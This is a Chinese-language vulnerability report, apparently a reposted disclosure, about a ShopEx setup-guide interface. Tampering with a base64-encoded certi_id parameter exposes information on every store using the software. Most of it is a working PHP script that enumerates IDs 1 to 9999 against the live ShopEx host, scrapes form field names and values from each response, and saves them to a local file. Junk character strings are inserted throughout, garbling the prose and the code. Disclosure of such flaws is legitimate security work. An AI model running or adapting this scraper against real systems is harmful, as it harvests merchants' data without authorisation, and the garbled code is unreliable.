|
|
简要描述:3 D L( d: x6 K+ }! n! y( S
ShopEx某接口缺陷,可遍历所有网站
7 _6 z9 t+ `0 O' I+ Z7 z" E/ V详细说明:
% s+ u* Q8 P1 f& Z问题出现在shopex 网店使用向导页面
1 w4 J q: E! _% Z+ j4 a
3 l( U9 T. d9 H/ y9 P: w& l3 O
' c, A1 j3 w+ E2 O+ w5 W0 ^( A6 { s5 E: m( d+ v+ U
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
" [1 `0 H5 [; n! o1 I i% [; Z9 q% R6 Z4 q
% w" }: e; G- d) @- W0 J1 v: H. r. I; ~
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
( l9 H: I, U. t. W) }4 V: p1 `! k3 v- w4 W/ O$ m0 x- E
- Z/ ~) D; _& b5 H$ l1 P
) x' g x0 p. ~$ y: G% k4 i6 m
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 ! Q) ]- F" T& h2 V$ ?" q7 w
4 p+ i+ z4 k3 ]* v2 _
" w0 H) I- G E' ]
1 A! F$ o" Q: I* J. t: \<?php
; F" k, P( w' u! v6 E, C% [
9 j. @" }$ r1 o( E( O0 v3 l for ($i=1; $i < 10000; $i++) { //遍历
7 O8 a. E( S, T* B, `' `: W! M d5 m0 a* a( @$ m
ShowshopExD($i);0 g& t- }$ c" I, c8 ?2 k. x7 i9 ]+ H% S
! w, O: n3 R7 i( p6 N, r( Q
} K1 Y$ `0 C+ Y$ y3 z# W
9 P+ W2 Q# p" P. y: |! ` m: D function ShowshopExD($cid) {
. d) `; B* v# g9 N8 p
7 B+ T+ _5 _+ x" D $url='http://guide.ecos.shopex.cn/step2.php';# i6 y8 x2 r+ Y8 s+ W1 K8 J: C: Q
/ j' q( P5 l/ H; O" s$ F4 `- V) } $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');) h4 ]4 I ?7 F7 i% _
, c% }, r2 c/ _) [2 ?1 y
$url = $url.'?refer='.$refer;1 d' X; y8 \, C# b/ a
1 H* k: s- \+ f. t7 w $ch = curl_init($url);
( Y" U1 l, Q+ g
! O; p4 Y) ^9 M& [6 w& n curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;+ A2 N/ I8 ~* D& I! D m
( [$ d0 j: u0 y2 S9 g4 M
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
- }! b7 V# a4 E& @6 V* L& ^9 s6 K0 ?8 {
$result = curl_exec($ch);
* ^5 C) R0 `4 N. s4 f
8 X4 @1 k' }, w; y& m $result = mb_convert_encoding($result, "gb2312", "UTF-8");* d4 b2 W# o, O. L" L- t
6 e. r, `( |( c( K6 H' M4 V: N1 u! C- X
if(strpos($result,$refer))! H$ Z3 ?# V, B" D6 D" c- g
; m" ~5 ~4 P0 R5 Z# w6 D2 c) q& o {0 s( ~( S4 Z# @: _+ L' g' r
% e, Z* d- F4 D G& _
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件8 k" f/ X' W8 Q% }, |
, l6 J$ a* y$ r* @7 u
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
$ d- N, f5 k( K; x2 }( F) c# c; p
3 p* }( P+ f$ F5 y foreach ($value[1] as $key) {9 l& B) S- ]8 p
8 @( k* h9 t! M p9 C5 g preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
2 Q R. o; Z6 N) D4 H% T- N% K4 S: D* \
echo $res[1][0].':'.$res[3][0]."\r\n";% B, x+ o( L) S4 ^
1 N2 W( s& v8 L# \& |9 ^
$col =$res[1][0].':'.$res[3][0]."\r\n";
5 O' u' O* i* m1 R W
/ y" h2 E+ {2 a- N( J! T7 U8 D1 ~ fwrite($fp, $col, strlen($col));
- x! X9 y0 \* i' l. b |; y: ?7 F4 u/ T( a: @/ j9 K) b! ]0 Z
}
4 I" D* b" K& d6 x' S9 ?
! m+ q+ U4 o. e( H1 V: a echo '--------------------------------'."\r\n";/ u2 C# _+ _" n) d% a
, n4 w& ^* [; `( ]
fclose($fp);
3 K- q& b3 N* A1 V/ g+ m3 {' D* O' |' r
}6 H* F( D9 E! |
7 y2 H J* n0 R flush();
& ~. U2 i$ D9 x" M. x
! ^. t4 K& q7 I curl_close($ch);
; s0 V6 S2 V; g0 M
3 T1 w0 r) f) @9 U1 W0 ^3 J }
' i. k- T3 d! c5 [: G" }* d& Q$ ]7 o
?>9 \3 D0 s% ?4 E4 d; u. Z$ _2 g
漏洞证明:
5 c8 W0 S+ M4 m; b6 o. v! a7 _http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
. e+ h2 ^" `2 l6 Yrefer换成其他加密方式
! e4 ?3 I M! A$ H3 a0 a! d% b |
|